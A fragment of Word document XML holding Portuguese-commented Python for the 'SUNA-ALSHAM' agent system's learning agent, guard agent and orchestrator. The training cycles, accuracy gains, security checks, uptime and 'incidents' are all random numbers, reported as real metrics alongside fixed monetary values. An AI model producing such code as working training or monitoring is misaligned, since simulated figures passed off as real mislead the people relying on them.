          <w:bCs/>
        </w:rPr>
        <w:t>o com GuardAgent estabelecida")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF01D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CA44A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self.accelerated_mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B92A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self.logger.info(f"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TREINAMENTO ACELERADO: Ciclos a cada {LEARN_CYCLE_INTERVAL//60} minutos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA5F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asyncio.create_task(self._run_accelerated_training())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D56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A830F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_run_accelerated_training(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FFF0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"""Executa ciclos automáticos de treinamento"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE97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self.running = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2605C4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while self.running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654C3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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC16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await self.run_training_cycle()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625C18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await asyncio.sleep(LEARN_CYCLE_INTERVAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E02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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1341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self.logger.error(f"Erro no treinamento acelerado: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4D8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await asyncio.sleep(60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D689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C5A22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run_training_cycle(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E0B7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"""Executa um ciclo de treinamento - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF04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self.training_cycles += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354982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02C47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🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando ciclo #{self.training_cycles} de treinamento ACELERADO")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9D6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D6238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Simular treinamento detalhado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1126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model_used = random.choice(self.learning_models)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFB0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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41BF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B504D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Atualizar performance com bonus de aceleração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE23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old_performance = self.performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437235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old_accuracy = self.accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7342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improvement = 0.001 + (random.random() * 0.02)  # 0.1-2% de melhoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE1A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4E63D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Bonus de aceleração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD339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self.accelerated_mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E9F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improvement += 0.005  # Bonus adicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23A7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4D316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self.performance = min(0.99, old_performance + improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210254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self.accuracy = min(99.9, self.accuracy + random.uniform(0.1, 0.5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71681A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1C52A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improvement_percent = ((self.performance - old_performance) / old_performance) * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E85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C17C6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Dados detalhados para drill-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372104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cycle_detail = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACBC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'cycle_id': self.training_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C77B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'timestamp': datetime.now().isoformat(),  # CORREÇÃO: Converter para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB36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'model_type': model_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEADF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'old_performance': old_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F9D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'new_performance': self.performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C948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'old_accuracy': old_accuracy,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF23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'new_accuracy': self.accuracy,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28675E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'improvement_percent': improvement_percent,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF09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'training_samples': random.randint(10000, 50000),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612C6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'epochs_completed': random.randint(10, 100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959E7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'loss_reduction': random.uniform(0.001, 0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19204A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6E51B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E4CFF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self.detailed_history.append(cycle_detail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE60F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len(self.detailed_history) &gt; 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E21E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self.detailed_history = self.detailed_history[-50:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6A7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37DFC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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ADICIONAR AO CONTADOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D1B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cycle_counter.add_learn_cycle({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C96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'performance': self.performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C135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'accuracy': self.accuracy,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762836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'model': model_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCDC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'samples': cycle_detail['training_samples']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B529A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5F2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85D89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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Performance: {old_performance:.3f} → {self.performance:.3f}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47832E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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Accuracy: {old_accuracy:.1f}% → {self.accuracy:.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D1B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Treinamento #{self.training_cycles} com {model_used} conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>do!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C26A7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1EBB3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get_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A474B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métricas do Learn Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BE3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34EFA9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'agent_id': self.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69345D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'performance': self.performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD00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'connection_status': self.connection_status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C6E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'training_cycles': self.training_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E606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'accuracy': self.accuracy,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338865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'accelerated_mode': self.accelerated_mode,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129BBE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'value': 550000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3EA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'last_model': self.detailed_history[-1]['model_type'] if self.detailed_history else 'Deep Neural Networks'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E18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B82C9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37CE3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get_detailed_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693ED4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métricas detalhadas para drill-down"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6841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7CA3A9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'basic_metrics': self.get_metrics(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DF9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'detailed_history': self.detailed_history[-10:],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207452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'accuracy_trend': [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2995AF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{'cycle': d['cycle_id'], 'accuracy': d['new_accuracy']} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CB3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d in self.detailed_history[-20:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B236B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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF46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'models_used': list(set([d['model_type'] for d in self.detailed_history])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C57A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'total_training_samples': sum([d['training_samples'] for d in self.detailed_history]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE84F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'avg_epochs': sum([d['epochs_completed'] for d in self.detailed_history[-10:]]) / min(10, len(self.detailed_history)) if self.detailed_history else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B77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F6A8CA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A298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GuardAgent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5B6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"""Guard Agent: Segurança e monitoramento - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210467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0FC69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2E5589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self.agent_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2278C1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 = logging.getLogger('guard_service')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9786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self.status = "normal"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092133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self.incidents_detected = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D109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self.uptime = 99.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353F8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self.checks_performed = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E78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self.accelerated_mode = ACCELERATED_MODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406B1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self.running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC79A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self.detailed_history = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278414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self.security_protocols = ['Anomaly Detection', 'Access Control', 'Threat Analysis', 'System Integrity']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E5E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5195B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initialize(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE10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"""Inicializa o Guard Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30A6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Guard Agent: Modo normal estabelecido")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077967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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Guard Agent API inicializado - ID: {self.agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788F2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BD5FE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self.accelerated_mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1AD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self.logger.info(f"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MONITORAMENTO ACELERADO: Verifica</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çõ</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>es a cada {GUARD_CHECK_INTERVAL//60} minutos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2476D0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asyncio.create_task(self._run_accelerated_monitoring())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1E81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64AD7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_run_accelerated_monitoring(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504681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"""Executa verificações automáticas de segurança"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD79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self.running = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9447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while self.running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EBB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FED3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await self.perform_security_check()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBC9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await asyncio.sleep(GUARD_CHECK_INTERVAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09662A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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6CB1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self.logger.error(f"Erro no monitoramento acelerado: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC9B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await asyncio.sleep(60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549DE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DDC40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perform_security_check(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65913F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"""Executa uma verificação de segurança - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1048C3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self.checks_performed += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E42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0D3C0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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificação de segurança #{self.checks_performed} ACELERADA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668344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4F30F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Simular verificação detalhada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93DC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protocol_used = random.choice(self.security_protocols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42728E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asyncio.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCE5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28E07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Atualizar uptime (pequenas variações)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9EC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old_uptime = self.uptime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673F4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self.uptime = min(99.9, 99.5 + random.random() * 0.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796720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45F05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Raramente detectar "incidentes" (para realismo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73B2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incident_detected = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA55A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random.random() &lt; 0.01:  # 1% de chance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA06A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self.incidents_detected += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7428AB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incident_detected = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A88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self.logger.warning(f"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Incidente detectado #{self.incidents_detected}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F2A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0BB0D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Dados detalhados para drill-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309B3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check_detail = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637C1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'check_id': self.checks_performed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640100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'timestamp': datetime.now().isoformat(),  # CORREÇÃO: Converter para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157977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'protocol': protocol_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE4B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'uptime': self.uptime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE5A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'incident_detected': incident_detected,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E946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'response_time': random.uniform(0.1, 0.5),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C20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'threats_scanned': random.randint(1000, 5000),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B848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'anomalies_found': random.randint(0, 3),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C38E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'security_score': random.uniform(95, 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07494E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2524E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AA669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self.detailed_history.append(check_detail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F77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len(self.detailed_history) &gt; 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108F2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self.detailed_history = self.detailed_history[-50:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E03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4AE16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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ADICIONAR AO CONTADOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC49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cycle_counter.add_guard_check({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B92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'uptime': self.uptime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DA4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'protocol': protocol_used,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0F8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'incident': incident_detected,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6981A0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'security_score': check_detail['security_score']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF549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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904FE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F9D41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Verifica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 #{self.checks_performed} conclu</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>da - Status: {self.status.upper()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE27C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1D33A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get_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F64D6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métricas do Guard Agent"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A938C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5994A2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'agent_id': self.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628D5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'status': self.status.upper(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579D9E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'uptime': self.uptime,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDA1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'incidents_detected': self.incidents_detected,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558F43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'checks': self.checks_performed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742642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'accelerated_mode': self.accelerated_mode,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACDA7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'value': 330000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1D9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'last_protocol': self.detailed_history[-1]['protocol'] if self.detailed_history else 'Anomaly Detection'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62206C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0FC60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D074E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get_detailed_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6AC1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métricas detalhadas para drill-down"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E93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40DA6C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'basic_metrics': self.get_metrics(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1687DE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'detailed_history': self.detailed_history[-10:],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75612A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'uptime_trend': [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB0BE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{'check': d['check_id'], 'uptime': d['uptime']} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685E6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d in self.detailed_history[-20:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBA4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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3691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'protocols_used': list(set([d['protocol'] for d in self.detailed_history])),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7850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'total_threats_scanned': sum([d['threats_scanned'] for d in self.detailed_history]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ABEA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'avg_response_time': sum([d['response_time'] for d in self.detailed_history[-10:]]) / min(10, len(self.detailed_history)) if self.detailed_history else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72592A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'avg_security_score': sum([d['security_score'] for d in self.detailed_history[-10:]]) / min(10, len(self.detailed_history)) if self.detailed_history else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C71C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EA77707" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698E09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Orchestrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091447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"""Orquestrador principal do sistema SUNA-ALSHAM - VERSÃO 10/10"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEFD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64F22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54E14D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self.orchestrator_id = str(uuid.uuid4())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FFB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 = logging.getLogger('orchestrator')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11B9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self.core_agent = CoreAgent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09DB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self.learn_agent = LearnAgent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A85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self.guard_agent = GuardAgent()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D252D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self.system_start_time = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CBA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8A6AB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initialize(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C53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"""Inicializa todos os agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5EE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self.logger.info(f"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Orchestrator iniciado - ID: {self.orchestrator_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEA1A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EF825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ACCELERATED_MODE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D2A2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self.logger.info("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MODO ACELERA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 ATIVADO - Ciclos autom</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ticos iniciados")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE44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D685A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Inicializar agentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775DE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self.guard_agent.initialize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7D7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self.learn_agent.initialize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568493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self.core_agent.initialize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371839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75B19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self.logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Todos os agentes inicializados com ACELERAÇÃO ativa")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDF34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9F63F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get_system_metrics(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F878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métricas completas do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15329D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core_metrics = self.core_agent.get_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3B9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learn_metrics = self.learn_agent.get_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284475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guard_metrics = self.guard_agent.get_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65501A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cycle_stats = cycle_counter.get_stats()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0876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58B424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Calcular performance geral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB4C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overall_performance = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25061E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core_metrics['performance'] * 0.4 +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3EC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learn_metrics['performance'] * 0.4 +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A3F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(guard_metrics['uptime'] / 100) * 0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913D6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) * 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091886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CF557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Calcular ciclos por hora</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2014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cycles_per_hour = cycle_stats['cycles_per_second'] * 3600 if cycle_stats['cycles_per_second'] &gt; 0 else 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8EA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2EE99C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533342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'system': {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709359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'status': 'ATIVO',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDA50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'performance': overall_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554128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'uptime': 99.9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC361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'agents_active': 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D0E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'total_agents': 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C496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'cycles_per_hour': round(cycles_per_hour, 1),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D93B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'accelerated_mode': ACCELERATED_MODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C74E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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012DE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'agents': {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEBAC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'core': core_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0254E1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'guard': guard_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D550A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'learn': learn_metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129269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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D693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'cycle_counter': cycle_stats,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E585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'total_value': 1430000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774457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'timestamp': datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E941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'recent_events': event_system.get_recent_events()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768724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99D08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86759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get_detailed_agent_metrics(self, agent_name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFDA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"""Retorna métricas detalhadas de um agente específico"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0FE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agent_name == 'core':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5605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self.core_agent.get_detailed_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620FD2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elif agent_name == 'learn':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEE6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self.learn_agent.get_detailed_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1B5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elif agent_name == 'guard':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FBFC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self.guard_agent.get_detailed_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B03A2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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657DEA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raise HTTPException(status_code=404, detail="Agent not found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA006EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583668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Instância global do orquestrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4265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orchestrator = Orchestrator()</w:t>
      </w:r>
    </w:p>
